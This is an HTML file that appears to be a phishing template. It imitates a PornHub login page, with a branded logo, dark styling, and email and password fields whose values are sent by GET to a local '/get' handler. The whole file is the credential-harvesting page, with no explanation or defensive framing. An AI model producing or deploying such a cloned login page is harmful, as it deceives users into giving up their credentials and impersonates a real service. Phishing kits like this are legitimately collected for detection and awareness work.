<!DOCTYPE html>
<html>
<head>
    <title>PornHub Login</title>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        body {
            background: #000000;
            color: #ffffff;
            font-family: Arial, sans-serif;
            text-align: center;
            margin: 0;
            padding: 0;
            height: 100vh;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        .container {
            max-width: 600px;
            padding: 10px;
        }
        .logo {
            color: #ff9900;
            font-size: 40px;
            text-decoration: none;
        }
        .form {
            margin-top: 30px;
        }
        .form input {
            width: 100%;
            margin: 10px 0;
            padding: 15px 10px;
            border: none;
        }
        .form button {
            background: #ff9900;
            border: none;
            padding: 10px 20px;
            color: #000000;
            cursor: pointer;
            font-size: 16px;
        }
    </style>
</head>
<body>
    <div class="container">
        <div class="row">
            <div class="col-lg-4 offset-lg-4 login-container">
                <a class="logo" href="#">PornHub</a>
                <p>Using your Account</p>
                <div class="form">
                    <form action="/get" id="email-form-step" method="get">
                        <div class="form-group">
                            <input name="email" type="text" class="form-control" placeholder="Email" required>
                        </div>
                        <div class="form-group">
                            <input name="password" type="password" class="form-control" placeholder="Password" required>
                        </div>
                        <div class="form-group">
                            <button type="submit">Login</button>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
</body>
</html>
